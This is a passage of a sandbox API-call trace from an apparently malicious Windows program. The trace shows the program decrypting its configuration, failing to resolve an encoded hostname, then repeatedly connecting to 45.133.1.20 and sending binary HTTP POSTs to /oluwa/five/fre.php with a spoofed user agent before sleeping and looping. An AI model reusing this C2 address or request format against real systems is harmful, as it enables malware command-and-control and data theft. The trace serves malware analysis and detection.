(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0304.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.848] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0304.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.849] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0304.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.850] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0304.850] GetProcessHeap () returned 0x6a0000 [0304.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0304.850] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0304.850] GetProcessHeap () returned 0x6a0000 [0304.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0304.851] GetProcessHeap () returned 0x6a0000 [0304.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0304.851] GetProcessHeap () returned 0x6a0000 [0304.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0304.852] GetProcessHeap () returned 0x6a0000 [0304.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0304.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.854] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.866] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0304.875] GetProcessHeap () returned 0x6a0000 [0304.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0304.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.877] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0304.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.878] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.884] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.884] GetProcessHeap () returned 0x6a0000 [0304.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0304.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.886] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0304.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.888] CryptDestroyKey (hKey=0x6ad520) returned 1 [0304.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0304.890] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0304.890] GetProcessHeap () returned 0x6a0000 [0304.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0304.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.891] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0304.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.893] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0304.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.894] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0304.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0304.895] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0304.895] GetProcessHeap () returned 0x6a0000 [0304.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0304.895] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0304.895] GetProcessHeap () returned 0x6a0000 [0304.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0304.895] socket (af=2, type=1, protocol=6) returned 0xb8c [0304.896] connect (s=0xb8c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0304.927] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0304.927] GetProcessHeap () returned 0x6a0000 [0304.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0304.927] GetProcessHeap () returned 0x6a0000 [0304.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6df748 [0304.928] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0304.929] wvsprintfA (in: param_1=0x6df748, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0304.929] GetProcessHeap () returned 0x6a0000 [0304.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6a80 [0304.929] GetProcessHeap () returned 0x6a0000 [0304.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df748 | out: hHeap=0x6a0000) returned 1 [0304.929] GetProcessHeap () returned 0x6a0000 [0304.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0304.929] GetProcessHeap () returned 0x6a0000 [0304.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6df748 [0304.930] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0304.931] wvsprintfA (in: param_1=0x6df748, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0304.931] GetProcessHeap () returned 0x6a0000 [0304.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0304.931] GetProcessHeap () returned 0x6a0000 [0304.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df748 | out: hHeap=0x6a0000) returned 1 [0304.931] send (s=0xb8c, buf=0x6bd460*, len=242, flags=0) returned 242 [0304.932] send (s=0xb8c, buf=0x6bb998*, len=159, flags=0) returned 159 [0304.932] GetProcessHeap () returned 0x6a0000 [0304.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0304.932] recv (in: s=0xb8c, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0305.005] GetProcessHeap () returned 0x6a0000 [0305.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0305.007] GetProcessHeap () returned 0x6a0000 [0305.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0305.008] GetProcessHeap () returned 0x6a0000 [0305.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6a80 | out: hHeap=0x6a0000) returned 1 [0305.009] GetProcessHeap () returned 0x6a0000 [0305.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0305.010] closesocket (s=0xb8c) returned 0 [0305.010] GetProcessHeap () returned 0x6a0000 [0305.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0305.010] GetProcessHeap () returned 0x6a0000 [0305.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0305.011] GetProcessHeap () returned 0x6a0000 [0305.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0305.011] GetProcessHeap () returned 0x6a0000 [0305.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0305.012] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18c8) returned 0xb8c [0305.014] Sleep (dwMilliseconds=0xea60) [0305.016] GetProcessHeap () returned 0x6a0000 [0305.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0305.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.017] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.026] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0305.043] GetProcessHeap () returned 0x6a0000 [0305.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d84a8 [0305.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.046] CryptImportKey (in: hProv=0x6beca0, pbData=0x6d84a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0305.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.050] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.051] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.051] GetProcessHeap () returned 0x6a0000 [0305.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d84a8 | out: hHeap=0x6a0000) returned 1 [0305.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.053] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0305.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.056] CryptDestroyKey (hKey=0x6ad020) returned 1 [0305.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.057] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0305.057] GetProcessHeap () returned 0x6a0000 [0305.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0305.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.058] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0305.059] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.059] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0305.059] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.060] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0305.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.061] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0305.061] GetProcessHeap () returned 0x6a0000 [0305.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0305.061] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0305.061] GetProcessHeap () returned 0x6a0000 [0305.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0305.062] GetProcessHeap () returned 0x6a0000 [0305.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0305.063] GetProcessHeap () returned 0x6a0000 [0305.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0305.063] GetProcessHeap () returned 0x6a0000 [0305.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0305.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.064] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.071] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0305.080] GetProcessHeap () returned 0x6a0000 [0305.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6db658 [0305.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.081] CryptImportKey (in: hProv=0x6bed28, pbData=0x6db658, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0305.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.082] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.083] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.084] GetProcessHeap () returned 0x6a0000 [0305.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db658 | out: hHeap=0x6a0000) returned 1 [0305.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.085] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0305.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.087] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0305.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.092] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0305.092] GetProcessHeap () returned 0x6a0000 [0305.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0305.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.093] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0305.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.094] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0305.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.096] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0305.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.102] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0305.102] GetProcessHeap () returned 0x6a0000 [0305.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0305.102] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0305.102] GetProcessHeap () returned 0x6a0000 [0305.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0305.102] socket (af=2, type=1, protocol=6) returned 0xb90 [0305.103] connect (s=0xb90, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0305.126] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0305.126] GetProcessHeap () returned 0x6a0000 [0305.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0305.126] GetProcessHeap () returned 0x6a0000 [0305.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6df748 [0305.127] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0305.128] wvsprintfA (in: param_1=0x6df748, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0305.128] GetProcessHeap () returned 0x6a0000 [0305.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6840 [0305.128] GetProcessHeap () returned 0x6a0000 [0305.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df748 | out: hHeap=0x6a0000) returned 1 [0305.129] GetProcessHeap () returned 0x6a0000 [0305.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0305.129] GetProcessHeap () returned 0x6a0000 [0305.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6df748 [0305.130] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0305.131] wvsprintfA (in: param_1=0x6df748, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0305.131] GetProcessHeap () returned 0x6a0000 [0305.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0305.131] GetProcessHeap () returned 0x6a0000 [0305.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df748 | out: hHeap=0x6a0000) returned 1 [0305.131] send (s=0xb90, buf=0x6bd460*, len=242, flags=0) returned 242 [0305.132] send (s=0xb90, buf=0x6bb998*, len=159, flags=0) returned 159 [0305.132] GetProcessHeap () returned 0x6a0000 [0305.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0305.132] recv (in: s=0xb90, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0305.199] GetProcessHeap () returned 0x6a0000 [0305.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0305.200] GetProcessHeap () returned 0x6a0000 [0305.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0305.201] GetProcessHeap () returned 0x6a0000 [0305.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6840 | out: hHeap=0x6a0000) returned 1 [0305.201] GetProcessHeap () returned 0x6a0000 [0305.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0305.201] closesocket (s=0xb90) returned 0 [0305.202] GetProcessHeap () returned 0x6a0000 [0305.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0305.202] GetProcessHeap () returned 0x6a0000 [0305.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0305.203] GetProcessHeap () returned 0x6a0000 [0305.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0305.203] GetProcessHeap () returned 0x6a0000 [0305.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0305.204] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18cc) returned 0xb90 [0305.206] Sleep (dwMilliseconds=0xea60) [0305.207] GetProcessHeap () returned 0x6a0000 [0305.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0305.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.209] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.217] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0305.231] GetProcessHeap () returned 0x6a0000 [0305.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0305.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.233] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0305.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.236] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.257] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.258] GetProcessHeap () returned 0x6a0000 [0305.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0305.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.260] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0305.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.261] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0305.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.267] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0305.268] GetProcessHeap () returned 0x6a0000 [0305.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0305.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.269] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0305.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.271] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0305.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.278] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0305.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.281] StrStrA 